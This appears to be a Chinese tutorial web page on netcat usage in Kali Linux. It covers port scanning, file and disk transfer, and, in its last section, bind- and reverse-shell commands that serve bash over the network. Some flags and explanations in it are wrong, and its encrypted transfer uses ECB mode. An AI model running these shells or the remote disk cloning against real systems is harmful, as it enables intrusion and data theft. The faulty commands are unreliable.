您好,登錄后才能下訂單哦!
kali 工具NETCAT的使用方法,針對(duì)這個(gè)問(wèn)題,這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答,希望可以幫助更多想解決這個(gè)問(wèn)題的小伙伴找到更簡(jiǎn)單易行的方法。
1.NETCAT作為客戶(hù)端常用的命令
nc -v verbose [use twice to be more verbose]
nc -n numeric-only IP addresses, no DNS
下列是nc的所有命令:
nc -vn 123.125.50.29 110(POP3服務(wù)器的110端口)
nc -nv 202.181.12.12 25(SMTP服務(wù)器的25端口)
2.NC--傳輸文本信息
服務(wù)器:nc -l -p 端口號(hào)
客戶(hù)端:nc -nv 服務(wù)器的ip 端口號(hào)
應(yīng)用:遠(yuǎn)程電子取證
ls -l的取證
ps aux的取證
3.nc文件/目錄傳輸
(1)文件傳輸
往服務(wù)器傳文件:
服務(wù)器:nc -ip 端口號(hào) > 文件名
客戶(hù)端:nc -nv 服務(wù)器ip地址 端口號(hào) < 文件名 -q 1
往客戶(hù)端傳文件:
服務(wù)器:nc -lp 端口號(hào) < 文件名 -q 1
客戶(hù)端:nc -nv 服務(wù)器ip地址 端口號(hào) > 文件名
2)目錄傳輸
也涉及雙向,和上述的文件傳輸類(lèi)似
向客戶(hù)端發(fā)送文件目錄:
服務(wù)器:tar -cvf - 目錄名/ | nc -lp 端口號(hào) -q 1
客戶(hù)端:nc -nv 服務(wù)器ip地址 端口號(hào) | tar -xvf -
(3)加密傳文件
服務(wù)器:nc -lp 端口號(hào) | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 文件名
客戶(hù)端:mcrypt --flush -Fbq -a rijndael-256 -m ecb < 文件名 | nc -nv ip地址 端口號(hào)-q 1
4.nc-流媒體服務(wù)
服務(wù)器:cat 文件名.mp4 | nc -lp 端口號(hào)
客戶(hù)端:nc -nv 服務(wù)器ip地址 端口號(hào) | 播放器(mplayer) -vo x11 -cache 3000 -
5.nc--端口掃描
nc -nvz ip地址 端口范圍 //掃描TCP端口
nc -nvzu ip地址 端口范圍 //掃描UDP端口
每一個(gè)掃描器的掃描結(jié)果都不是特別準(zhǔn)確的,可以多使用幾種方式對(duì)端口進(jìn)行掃描以增加準(zhǔn)確性
6.nc--遠(yuǎn)程克隆硬盤(pán)
服務(wù)器:nc -lp 端口號(hào) | dd of=/dev/sda
客戶(hù)端:dd if=/dev/sda | nc -nv 服務(wù)器ip地址 端口號(hào) -q 1
遠(yuǎn)程電子取證,可以將目標(biāo)服務(wù)器硬盤(pán)遠(yuǎn)程復(fù)制,或者內(nèi)存
7.nc--遠(yuǎn)程控制
正向:服務(wù)器:nc -lp 端口 -C bash
客戶(hù)端:nc -nv 服務(wù)器ip地址 端口
這樣可以使服務(wù)器獲得客戶(hù)端的一個(gè)bash
反向:服務(wù)器:nc -lp 端口
客戶(hù)端:nc 服務(wù)器ip地址 端口 -C bash
這樣可以使客戶(hù)端獲得服務(wù)器的一個(gè)bash
nc缺乏加密和身份驗(yàn)證的能力
關(guān)于kali 工具NETCAT的使用方法問(wèn)題的解答就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,如果你還有很多疑惑沒(méi)有解開(kāi),可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識(shí)。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。